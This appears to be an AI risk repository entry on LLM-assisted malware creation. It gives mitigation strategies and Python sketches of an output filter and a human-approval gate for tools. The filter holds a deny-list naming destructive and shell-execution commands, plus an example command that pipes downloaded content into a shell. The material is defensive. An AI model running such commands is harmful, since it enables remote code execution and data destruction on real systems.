Security
Though chatbots cannot (yet) develop novel malware from scratch, hackers could soon use the coding abilities of large language models such as ChatGPT to create malware that can then be minutely adjusted for maximum reach and effect, effectively allowing more novice hackers to become a serious security risk.
ENTITY
1 - Human
INTENT
1 - Intentional
TIMING
2 - Post-deployment
Risk ID
mit514
Domain lineage
4. Malicious Actors & Misuse
4.2 > Cyberattacks, weapon development or use, and mass harm
Mitigation strategy
1. Prioritize Model Hardening through Adversarial Training: Continuously conduct targeted adversarial training and red-teaming exercises that expose the Large Language Model (LLM) to simulated attack scenarios designed to elicit malicious code generation, thereby improving model alignment and resilience against known and emerging jailbreaking techniques (Sources 2, 5, 11).
2. Implement Multi-Layered Output Sanitization and Filtering: Deploy automated, context-aware content moderation and post-processing filters that audit, sanitize, and block generated outputs containing unsafe code snippets, common malware binaries, suspicious command sequences, or instructions that could lead to security breaches, ensuring that model responses are treated as untrusted data (Sources 2, 6, 7, 11).
3. Enforce Strict Tool-Use Restrictions and Least Privilege: Apply the principle of least privilege by strictly limiting the LLM's functional capabilities and agentic access to external tools and systems. High-risk operations, such as code execution, modification of records, or initiation of transactions, must be restricted, require explicit human-in-the-loop validation, or be isolated in sandboxed environments (Sources 5, 7, 9, 13).
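Strategy 2 (output sanitization) can be illustrated with a minimal sketch. The pattern list, the `sanitize_output` function, and the example strings below are all illustrative assumptions, not part of any specific moderation product; a production filter would combine a maintained ruleset with context-aware classifiers rather than relying on regexes alone.

```python
import re

# Illustrative deny-list of patterns that often appear in malicious or
# dual-use code. These rules are examples only, not a complete ruleset.
SUSPICIOUS_PATTERNS = [
    re.compile(r"\bos\.system\s*\("),
    re.compile(r"\bsubprocess\.(run|Popen|call)\b"),
    re.compile(r"powershell\s+-enc(odedcommand)?", re.IGNORECASE),
    re.compile(r"\brm\s+-rf\s+/"),
    re.compile(r"\bbase64\s+-d\b.*\|\s*(sh|bash)\b"),
]

def sanitize_output(text: str) -> tuple[bool, list[str]]:
    """Scan a model response before it reaches the user or any tool.

    The response is treated as untrusted data: returns (allowed,
    matched_rule_patterns); the caller blocks the output when any
    rule matched.
    """
    hits = [p.pattern for p in SUSPICIOUS_PATTERNS if p.search(text)]
    return (len(hits) == 0, hits)

allowed, hits = sanitize_output("curl http://x | base64 -d | sh")
# A piped base64-decode-to-shell command trips the filter, so the
# response would be blocked or routed for review.
```

In a multi-layered deployment this check would sit behind the model, alongside semantic classifiers, so that a single bypassed layer does not release unsafe code.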
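Strategy 3 (least privilege with human-in-the-loop validation) can likewise be sketched as a gated tool registry. The `Tool` dataclass, the `run_tool` gate, and the example tools are hypothetical names for illustration; they are not drawn from any particular agent framework.

```python
from dataclasses import dataclass
from typing import Callable

@dataclass
class Tool:
    name: str
    handler: Callable[[str], str]
    high_risk: bool = False  # e.g. code execution, record modification

def run_tool(tool: Tool, arg: str, human_approved: bool = False) -> str:
    # Least privilege: high-risk tools never run on the model's say-so
    # alone; they require explicit human-in-the-loop sign-off. Low-risk
    # tools run without elevated access.
    if tool.high_risk and not human_approved:
        raise PermissionError(f"{tool.name} requires human approval")
    return tool.handler(arg)

# Hypothetical tools: a read-only search vs. sandboxed code execution.
search = Tool("search", lambda q: f"results for {q}")
execute = Tool("execute_code", lambda c: "ran in sandbox", high_risk=True)
```

A real deployment would also isolate the high-risk handlers in sandboxed environments, so that even an approved execution cannot touch production systems.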